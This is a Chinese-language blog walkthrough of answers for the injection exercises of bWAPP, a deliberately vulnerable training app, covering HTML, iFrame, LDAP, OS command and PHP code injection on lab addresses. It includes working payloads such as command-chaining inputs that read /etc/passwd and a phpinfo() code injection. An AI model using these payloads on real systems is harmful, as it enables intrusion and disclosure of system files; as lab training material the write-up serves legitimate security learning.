前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Bwapp漏洞平台答案全解-A1(第一篇)

Bwapp漏洞平台答案全解-A1(第一篇)

作者头像
用户1467662
发布2018-03-30 10:28:10
3.1K0
发布2018-03-30 10:28:10
举报
文章被收录于专栏:农夫安全农夫安全

前言

小编在刚开始学习web安全的时候也是很迷茫,还好有两个比较好的漏洞演练平台,第一个接触的是DVWA,第二个是Bwapp,第二个对我本人的帮助很大,之前有做了很多个答案,现在把自己做的答案公布出来(由于环境漏洞数量太多,就分多次发布),希望对小白有所帮助。

0x01 A1 - Injection(第一次)

***********************注入*********************

1.1-HTML Injection – Reflected (GET)

输入框输入:<a href=http://www.baidu.com>点这里</a>

1.2-HTML Injection - Reflected (POST)

输入框:<a href=http://www.baidu.com>点输入这里</a>

1.3-HTML Injection - Reflected (URL)

原始URL:http://10.X.X.X/bWAPP/htmli_current_url.php

漏洞URL:http://10.93.1.155/bWAPP/htmli_current_url.php#<h1>XSS DOM</h1>

1.4-HTML Injection - Stored (Blog)

输入框输入:<a href=http://www.baidu.com>点这里</a>

在留言板出现:点这里

点击之后跳转至百度

1.5-iFrame Injection

漏洞文件:robots.txt

原始URL:

http://10.93.1.46/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250

漏洞URL:

http://10.93.1.46/bWAPP/iframei.php?ParamUrl=http://www.baidu.com&ParamWidth=250&ParamHeight=250

-1.6-LDAP Connection Settings

LDAP:轻量目录访问协议

LDAP注入

LDAP注入攻击和SQL注入攻击相似,因此接下来的想法是利用用户引入的参数生成LDAP查询。一个安全的Web应用在构造和将查询发送给服务器前应该净化用户传入的参数。在有漏洞的环境中,这些参数没有得到合适的过滤,因而攻击者可以注入任意恶意代码。 使用得最广泛的LDAP:ADAM和OpenLDAP。

资料:http://blog.csdn.net/qq_19876131/article/details/50577355

-1.7-Mail Header Injection (SMTP)

邮件头注入,这个希望有大佬做出来的跟小编一起交流下

1.8-OS Command Injection

在输入框里面输入

www.nsa.gov;dir

www.nsa.gov&&dir

原理:在DNS查询之后在执行dir命令

1.9-OS Command Injection- Blind

猜测是target参数可以注入

输入ping 127.0.0.1

在输入ping 127.0.0.1;cat /etc/passwd

1.10-PHP Code Injection

漏洞参数:message

漏洞原理URL:

http://10.93.1.46/bWAPP/phpi.php?message

漏洞URL:

http://10.93.1.46/bWAPP/phpi.php?message=phpinfo()

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-07-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 0x01 A1 - Injection(第一次)
    • 1.1-HTML Injection – Reflected (GET)
      • 1.2-HTML Injection - Reflected (POST)
        • 1.3-HTML Injection - Reflected (URL)
          • 1.4-HTML Injection - Stored (Blog)
            • 1.5-iFrame Injection
              • -1.6-LDAP Connection Settings
                • -1.7-Mail Header Injection (SMTP)
                  • 1.8-OS Command Injection
                    • 1.9-OS Command Injection- Blind
                      • 1.10-PHP Code Injection
                      领券
                      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档